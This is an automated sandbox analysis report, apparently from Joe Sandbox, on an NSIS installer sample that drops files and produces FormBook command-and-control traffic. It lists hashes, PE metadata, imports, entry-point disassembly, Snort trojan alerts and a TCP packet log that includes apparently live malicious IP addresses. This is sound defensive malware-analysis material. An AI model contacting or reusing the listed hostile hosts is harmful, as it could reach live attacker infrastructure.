C:\Users\user\AppData\Local\Temp\Cascara\Personers\Narra\SourceCodePro-Light.otf

Download File

Process:	C:\Users\user\Desktop\hi38VYWujz.exe
File Type:	OpenType font data
Category:	dropped
Size (bytes):	131784
Entropy (8bit):	7.086332625552384
Encrypted:	false
SSDEEP:	3072:jz0TOC7z/qv+I+IDHmR76AWrsfkWUXcoD0nFdq/Opp2+XFu:u7z/E+kiRmAiPXCFtppvU
MD5:	493FB59AD73EFFA2F2B57EAF63752AD8
SHA1:	E02268E599444EDE7A78080737047E5D63BF4F76
SHA-256:	AEF089E567C1D1FA472AF7AAC246C8FF850A4F1F392348A2815D48889C352757
SHA-512:	942E15F9F4F833E5DEBAFC881ACAD96E8FE8C5C8F4D7F79539CA9B4FC3986616281C96C3231CA8EC7D36AA9D1DE53A1504C4CEEE40FCF52642BD460463FF0A16
Malicious:	false
Preview:	OTTO.......`BASEe.]....x...FCFF ......FL..{zDSIG............GDEF...........GPOS.>.`...D...2GSUB..]........JOS/2.x....P...`cmap.spB......3fhead..h........6hhea.3.....$...$hmtx-.0........Bmaxp. P....H....name...m........post...3..F,... ............_.<......................I.:...$.......................X.I.I......................P.. .....X.,.......X...K...X...^.2. ............ .....8.........ADBO... ............`.............. .....J.~.................................$.............<...........H...........T...........`...........l.........&.~.........&......................6...........D..........:.n.....................2...........$.......................D.............................................H...........*...........d.X.........&.......................4...........4...........2........... .<.........4.\..........................................................................................................."...........4.........$.F......... .j.........,...........0............

C:\Users\user\AppData\Local\Temp\Cascara\Personers\Narra\Tinnes.The180

Download File

Process:	C:\Users\user\Desktop\hi38VYWujz.exe
File Type:	data
Category:	dropped
Size (bytes):	417096
Entropy (8bit):	6.38076077365734
Encrypted:	false
SSDEEP:	12288:6cVpH/rMN4d9rO4Lap4sGBowvBc1bDMQj:vV5/r44WYf5gDMQ
MD5:	5FA58B744AD3A240A407889768CAD915
SHA1:	9FC80A43C11EA5AD4E4E91E3841F4B3D1204676A
SHA-256:	E8E6101A1F799B9376119458D914F6009B755BC70AA9F6EDA6774BA6A040FE91
SHA-512:	565AA967201442A554A579B8DECDEBC2885806E3F9E87C4BE25FBFB51593CC678F9A2A47E813D6CEE192D1F6B313E58934366865123AAC18AD972C65144D5E5E
Malicious:	false
Preview:	...E.......b.......--........z.............%%%.......F.yy........................l..?????.............--....5...AA..........................................(.........../.;...................a..LLLL.........LLLLLLLL..####................j..........===.......1.......%%.................LL...............................UUUUUUU.,,,.oooo.........................WWW....................X.................0.....nn..........l.lll...........................4..................F...8........... .'.....Q.......G................""".<<<<<..??.''................VV...]]]]]....++++......,........fffff.........o......ZZ........____....:.................000.........o..............".........T...E........T...........YYYYY.222...................................~~~~~~............................................................ii........L..D...........C...]]]]]]]....:...................)................................\|.....4.......XXXX....*...............AAA..kk......J........."""...................++.q.........

C:\Users\user\AppData\Local\Temp\nscDB19.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\hi38VYWujz.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.659384359264642
Encrypted:	false
SSDEEP:	192:ex24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlESlS:h8QIl972eXqlWBFSt273YOlEz
MD5:	8B3830B9DBF87F84DDD3B26645FED3A0
SHA1:	223BEF1F19E644A610A0877D01EADC9E28299509
SHA-256:	F004C568D305CD95EDBD704166FCD2849D395B595DFF814BCC2012693527AC37
SHA-512:	D13CFD98DB5CA8DC9C15723EEE0E7454975078A776BCE26247228BE4603A0217E166058EBADC68090AFE988862B7514CB8CB84DE13B3DE35737412A6F0A8AC03
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: STS-QP-18-01-D.doc.exe, Detection: malicious, Browse Filename: STS-QP-18-01-D.doc.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.NSIS.Agent.22628.17291.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.NSIS.Agent.22628.17291.exe, Detection: malicious, Browse Filename: iR7XrRSd21.exe, Detection: malicious, Browse Filename: 5HoWa3IFSq.exe, Detection: malicious, Browse Filename: uB6mPXoyst.exe, Detection: malicious, Browse Filename: iR7XrRSd21.exe, Detection: malicious, Browse Filename: 5HoWa3IFSq.exe, Detection: malicious, Browse Filename: uB6mPXoyst.exe, Detection: malicious, Browse Filename: TM001829.exe, Detection: malicious, Browse Filename: 6yp4a0kNOX.exe, Detection: malicious, Browse Filename: TM001829.exe, Detection: malicious, Browse Filename: 6yp4a0kNOX.exe, Detection: malicious, Browse Filename: Products_specifications.doc.exe, Detection: malicious, Browse Filename: Products_specifications.doc.exe, Detection: malicious, Browse Filename: PURCHASE_ORDER.xls, Detection: malicious, Browse Filename: DOCS-INV.PKL-778012DHL-PARCEL_INFO.exe, Detection: malicious, Browse Filename: DOCS-INV.PKL-778012DHL-PARCEL_INFO.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....uY...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..`....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.9184325558126565
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	hi38VYWujz.exe
File size:	570'384 bytes
MD5:	63abea7feba39deb21bcbefd7926f00e
SHA1:	cd616dbf86a53beca504e72e9096ed45903794f4
SHA256:	b028ced984ab94ba551b890e2b55645509a1bfd4f2970b592ada728de261a379
SHA512:	4a5546e126d38cf3ebec94fc5dc57eeedd7f9d5d608f015de71a65dd67a35177e235471cff4c58b1a559d5a0c55a1c64d9da48d528be1f1f6c2f61bfda30d193
SSDEEP:	12288:cKxSm84N/v0DdLFtR1RVSz6//Ki74XMDwTfAIeRKeXqEH:V84VvcdhDd0wKXMEeR/aw
TLSH:	00C42306AA75E26BFDF32B350E76B7876D392D2411D31B57075027866D32388BE2A10F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....uY.................d....:....

File Icon


Icon Hash:	0606161f4d685b67

Static PE Info

General

Entrypoint:	0x403350
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x59759518 [Mon Jul 24 06:35:04 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b34f154ec913d2d2c435cbd644e91687

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=Nonalignment@Fabriksejerne.Ele, OU="Amben Sportspladserne Semiperimeter ", O=Slipperyroot, L=Nohfelden, S=Saarland, C=DE
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	28/10/2022 09:43:08 27/10/2025 08:43:08
Subject Chain	E=Nonalignment@Fabriksejerne.Ele, OU="Amben Sportspladserne Semiperimeter ", O=Slipperyroot, L=Nohfelden, S=Saarland, C=DE
Version:	3
Thumbprint MD5:	58C80C1BF0C504A0ADD5E1B566346BB4
Thumbprint SHA-1:	C0CDB0DCF374483813C7BE49D39DC2F3663F431A
Thumbprint SHA-256:	C227355B189036BF3D19F8E4C8350777E973B0E9A831243D069A2D4A1914F20C
Serial:	11DC462C7FACC1ECB46688E9BFE37E66EC7E5AFC

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A2E0h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080A8h]
call dword ptr [004080A4h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [007A8A2Ch], eax
je 00007F1CA0DB24F3h
push ebx
call 00007F1CA0DB5789h
cmp eax, ebx
je 00007F1CA0DB24E9h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007F1CA0DB5703h
push esi
call dword ptr [00408150h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007F1CA0DB24CCh
push 0000000Ah
call 00007F1CA0DB575Ch
push 00000008h
call 00007F1CA0DB5755h
push 00000006h
mov dword ptr [007A8A24h], eax
call 00007F1CA0DB5749h
cmp eax, ebx
je 00007F1CA0DB24F1h
push 0000001Eh
call eax
test eax, eax
je 00007F1CA0DB24E9h
or byte ptr [007A8A2Fh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [004082A0h]
mov dword ptr [007A8AF8h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 0079FEE0h
call dword ptr [00408188h]
push 0040A2C8h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84fc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3da000	0x16468	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x89bb0	0x1860	.data
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x63c8	0x6400	False	0.6766015625	data	6.504099201068482	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x138e	0x1400	False	0.4509765625	data	5.146454805063938	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x39eb38	0x600	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x3a9000	0x31000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3da000	0x16468	0x16600	False	0.8527845670391061	data	7.431622782443815	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_BITMAP	0x3da3d0	0x368	Device independent bitmap graphic, 96 x 16 x 4, image size 768	English	United States	0.23623853211009174
RT_ICON	0x3da738	0xf8e0	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9945536162732296
RT_ICON	0x3ea018	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.5178423236514523
RT_ICON	0x3ec5c0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.573170731707317
RT_ICON	0x3ed668	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.634594882729211
RT_ICON	0x3ee510	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.7161552346570397
RT_ICON	0x3eedb8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.45664739884393063
RT_ICON	0x3ef320	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6906028368794326
RT_DIALOG	0x3ef788	0x144	data	English	United States	0.5216049382716049
RT_DIALOG	0x3ef8d0	0x13c	data	English	United States	0.5506329113924051
RT_DIALOG	0x3efa10	0x120	data	English	United States	0.5138888888888888
RT_DIALOG	0x3efb30	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x3efc50	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x3efd18	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x3efd78	0x68	data	English	United States	0.7019230769230769
RT_VERSION	0x3efde0	0x260	data	English	United States	0.5049342105263158
RT_MANIFEST	0x3f0040	0x423	XML 1.0 document, ASCII text, with very long lines (1059), with no line terminators	English	United States	0.5127478753541076

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.11.2034.138.169.850281802018752 07/05/23-14:06:25.128312	TCP	2018752	ET TROJAN Generic .bin download from Dotted Quad	50281	80	192.168.11.20	34.138.169.8
192.168.11.20172.67.140.12850292802031412 07/05/23-14:09:08.747292	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	50292	80	192.168.11.20	172.67.140.128
192.168.11.201.1.1.157075532023883 07/05/23-14:10:11.745985	UDP	2023883	ET DNS Query to a *.top domain - Likely Hostile	57075	53	192.168.11.20	1.1.1.1
192.168.11.20160.124.149.17650295802031412 07/05/23-14:10:31.285472	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	50295	80	192.168.11.20	160.124.149.176
192.168.11.20217.70.184.5050287802031412 07/05/23-14:07:26.793879	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	50287	80	192.168.11.20	217.70.184.50
192.168.11.20103.169.142.050289802031412 07/05/23-14:07:47.341708	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	50289	80	192.168.11.20	103.169.142.0
192.168.11.201.1.1.153849532023883 07/05/23-14:11:32.290600	UDP	2023883	ET DNS Query to a *.top domain - Likely Hostile	53849	53	192.168.11.20	1.1.1.1
192.168.11.20104.17.158.150291802031412 07/05/23-14:08:48.505600	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	50291	80	192.168.11.20	104.17.158.1

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 5, 2023 14:06:24.981298923 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.124223948 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.124588013 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.128312111 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.270714998 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.271053076 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.271128893 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.271184921 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.271243095 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.271297932 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.271300077 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.271351099 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.271357059 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.271405935 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.271460056 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.271471977 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.271471977 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.271512032 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.271544933 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.271567106 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.271648884 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.271697044 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.271797895 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.413697004 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.413794994 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.413865089 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.413933039 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.413991928 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.413997889 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.414060116 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.414063931 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.414130926 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.414187908 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.414196014 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.414258957 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.414324045 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.414334059 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.414335012 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.414386988 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.414401054 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.414401054 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.414449930 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.414513111 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.414566994 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.414567947 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.414575100 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.414633989 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.414639950 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.414702892 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.414752960 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.414753914 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.414764881 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.414819002 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.414828062 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.414891005 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.414935112 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.414935112 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.414952993 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.415000916 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.415155888 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.557025909 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.557117939 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.557185888 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.557249069 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.557287931 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.557311058 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.557357073 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.557357073 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.557379007 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.557425022 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.557446003 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.557509899 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.557549953 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.557550907 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.557573080 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.557616949 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.557637930 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.557699919 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.557763100 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.557792902 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.557826996 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.557871103 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.557871103 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.557890892 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.557955027 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.558017015 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.558027029 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.558078051 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.558082104 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.558140039 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.558201075 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.558202028 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.558202028 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.558264017 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.558268070 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.558326006 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.558388948 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.558402061 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.558403015 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.558403015 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.558449984 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.558476925 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.558514118 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.558526039 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.558576107 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.558638096 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.558650970 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.558701992 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.558731079 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.558763981 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.558779001 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.558826923 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.558855057 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.558887959 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.558906078 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.558949947 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.558990955 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.559010983 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.559072971 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.559093952 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.559134007 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.559174061 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.559174061 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.559195995 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.559257984 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.559298038 CEST	50281	80	192.168.11.20	34.138.169.8
